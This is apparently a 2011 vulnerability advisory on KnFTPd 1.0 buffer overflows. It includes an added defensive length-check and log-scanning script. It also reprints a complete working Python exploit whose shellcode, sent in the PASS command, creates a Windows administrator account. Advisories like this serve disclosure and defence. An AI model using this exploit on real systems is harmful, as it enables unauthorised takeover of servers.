KnFTPd FTP Server Multiple Command Remote Buffer Overflow Vulnerability
Release date: 2011-09-02
Updated: 2011-09-02
Affected systems:
KFTPD KnFTPd FTP Server 1.0
Description:
BUGTRAQ ID: 49427
KnFTPD is an FTP server developed by uw.
The KnFTPd FTP server contains remote buffer overflow vulnerabilities in its implementation of multiple commands. A remote attacker can exploit them to execute arbitrary code in the context of the affected application or to cause a denial of service.
The vulnerability is triggered by sending an over-long argument to any of several FTP commands (USER, PASS, REIN, QUIT, PORT, PASV, TYPE, STRU, MODE, RETR, STOR, APPE, ALLO, REST, RNFR, RNTO, ABOR, DELE, CWD, LIST, NLST, SITE, STST, HELP, NOOP, MKD, RMD, PWD, CDUP, STOU, SNMT, SYST, XPWD).
<* Source: liuqx
Link: http://www.securityfocus.com/archive/1/519498
*>
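The defect class described above is an FTP command handler that copies a command argument into a fixed-size buffer without checking its length. The following added example (not part of this advisory or of the KnFTPd project) shows the two things a defender wants from this description: a parser that enforces an argument-length bound before a command is dispatched, and a scanner that flags control-channel lines carrying over-long arguments to the commands listed above. The 255-byte limit is an assumption made for this example (RFC 959 sets no argument bound), and the sample lines are constructed; the over-long PASS argument is filler of roughly the size the proof of concept sends, not a payload.

```python
# Added defensive example; not code from the NSFOCUS advisory or from KnFTPd.
import re

# Command set exactly as listed in the advisory.
AFFECTED_COMMANDS = frozenset("""
USER PASS REIN QUIT PORT PASV TYPE STRU MODE RETR STOR APPE ALLO REST
RNFR RNTO ABOR DELE CWD LIST NLST SITE STST HELP NOOP MKD RMD PWD CDUP
STOU SNMT SYST XPWD
""".split())

# Assumed bound for this example: RFC 959 does not limit argument length,
# so a server must pick a limit that its own buffers can hold.
MAX_ARG_LEN = 255

# One control-channel line: 3-4 letter verb, optional space-separated
# argument, optional CRLF. DOTALL lets the argument group swallow the
# line ending, which is stripped afterwards.
_CMD_RE = re.compile(rb"^([A-Za-z]{3,4})(?: (.*))?\r?\n?$", re.DOTALL)


def parse_ftp_command(raw, max_arg_len=MAX_ARG_LEN):
    """Split one raw control-channel line into (verb, argument).

    Rejects an over-long argument with ValueError before it can reach a
    fixed-size buffer, which is the handling the vulnerable server lacks.
    """
    m = _CMD_RE.match(raw)
    if not m:
        raise ValueError("malformed command line")
    verb = m.group(1).upper().decode("ascii")
    arg = (m.group(2) or b"").rstrip(b"\r\n")
    if len(arg) > max_arg_len:
        raise ValueError("argument too long: %d bytes for %s" % (len(arg), verb))
    return verb, arg


def scan_control_channel(lines, max_arg_len=MAX_ARG_LEN):
    """Report lines whose verb is an affected command and whose argument
    exceeds max_arg_len. Each finding is (line_no, verb, argument_length)."""
    findings = []
    for n, raw in enumerate(lines, 1):
        m = _CMD_RE.match(raw)
        if not m:
            continue  # not a command line (e.g. server reply or garbage)
        verb = m.group(1).upper().decode("ascii", "replace")
        arg = (m.group(2) or b"").rstrip(b"\r\n")
        if verb in AFFECTED_COMMANDS and len(arg) > max_arg_len:
            findings.append((n, verb, len(arg)))
    return findings


# Constructed sample capture: a normal login sequence in which the PASS
# argument is 301 'A' bytes plus a trailing space, about the length the
# advisory's proof of concept sends.
SAMPLE_LINES = [
    b"USER test \r\n",
    b"PASS " + b"A" * 301 + b" \r\n",
    b"SYST\r\n",
    b"CWD /pub\r\n",
]

if __name__ == "__main__":
    for line_no, verb, size in scan_control_channel(SAMPLE_LINES):
        print("line %d: %s argument of %d bytes exceeds limit %d"
              % (line_no, verb, size, MAX_ARG_LEN))
```

Run stand-alone, the scanner reports only the PASS line (302 bytes after the line ending is stripped); `parse_ftp_command` accepts the other three lines and raises on that one. In a real deployment the same bound check belongs in the server before dispatch, and the scanner logic can be pointed at an FTP control-channel capture or proxy log to spot attempts against an unpatched host.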
Test method:
WARNING
The following program (method) may be offensive in nature and is provided for security research and teaching purposes only. Use at your own risk!
# KnFTPd FTP Server v1.0.0 Multiple Command Remote Buffer Overflow Exploit
# Software Link: http://sourceforge.net/projects/knftp/files/KnFTPd/1.0.0/
# Affected Version:1.0.0
# Affected Command:
# "USER","PASS","REIN","QUIT","PORT","PASV","TYPE","STRU",
# "MODE","RETR","STOR","APPE","ALLO","REST","RNFR","RNTO",
# "ABOR","DELE","CWD","LIST","NLST","SITE","STST","HELP",
# "NOOP","MKD","RMD","PWD","CDUP","STOU","SNMT","SYST","XPWD"
#
# Vulnerability Discovered by Qixu Liu of NCNIPC (liuqx (at) nipc.org (dot) cn [email concealed])
# Date: 02/09/2011
# Thanks to: Zhejun Fang, Cheng Luo
# Tested on: Windows XP SP3 Chinese (zh-cn)
# Shellcode: Exploiting "PASS" Command to add a new system user "zrl:123456"
from struct import pack
import socket,sys
import os
if len(sys.argv) != 3:
    print "Usage: knftpd_exploit.py [IP] [PORT]"
    sys.exit(1)
target = sys.argv[1]
port = int(sys.argv[2])
shellcode= "\x33\xdb\xb7\x02\x2b\xe3"
shellcode+= "\xeb\x1b\x5b\x31\xc0\x50\x31\xc0\x88\x43\x5d\x53\xbb\xad\x23\x86\x7c"
shellcode+= "\xff\xd3\x31\xc0\x50\xbb\xfa\xca\x81\x7c\xff\xd3\xe8\xe0\xff\xff\xff"
shellcode+= "\x63\x6d\x64\x2e\x65\x78\x65\x20\x2f\x63\x20\x6e\x65\x74\x20\x75\x73"
shellcode+= "\x65\x72\x20\x7a\x72\x6c\x20\x31\x32\x33\x34\x35\x36\x20\x2f\x61\x64"
shellcode+= "\x64\x20\x26\x26\x20\x6e\x65\x74\x20\x6c\x6f\x63\x61\x6c\x67\x72\x6f"
shellcode+= "\x75\x70\x20\x41\x64\x6d\x69\x6e\x69\x73\x74\x72\x61\x74\x6f\x72\x73"
shellcode+= "\x20\x2f\x61\x64\x64\x20\x7a\x72\x6c\x20\x26\x26\x20\x6e\x65\x74\x20"
shellcode+= "\x75\x73\x65\x72\x20\x7a\x72\x6c"
eip ="\x12\x45\xfa\x7f" #jmp esp
eip += "\x90"*8
eip += "\xe9\x06\xff\xff\xff"
nops = "\x90" * 157
payload = "\x90" * 57 + shellcode + "\x90" * 94 +eip
print "[+] Connecting to Target " + target + "..."
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    connect=s.connect((target, port))
    print "[+] Target FTP Connected!"
except:
    print "[!] FTP didn't respond\n"
    sys.exit(0)
s.send('USER test \r\n')
s.recv(1024)
print "[+] Sending payload...length " +str(len(payload))
s.send('PASS ' + payload +' \r\n')
s.recv(1024)
print "[!] Exploit has been sent!. Please check the new user 'zrl'\n"
s.close()
Recommendation:
Vendor patch:
KFTPD
-----
The vendor has not yet released a patch or upgrade. Users of this software are advised to monitor the vendor's homepage for the latest version:
http://kftpd.software.informer.com/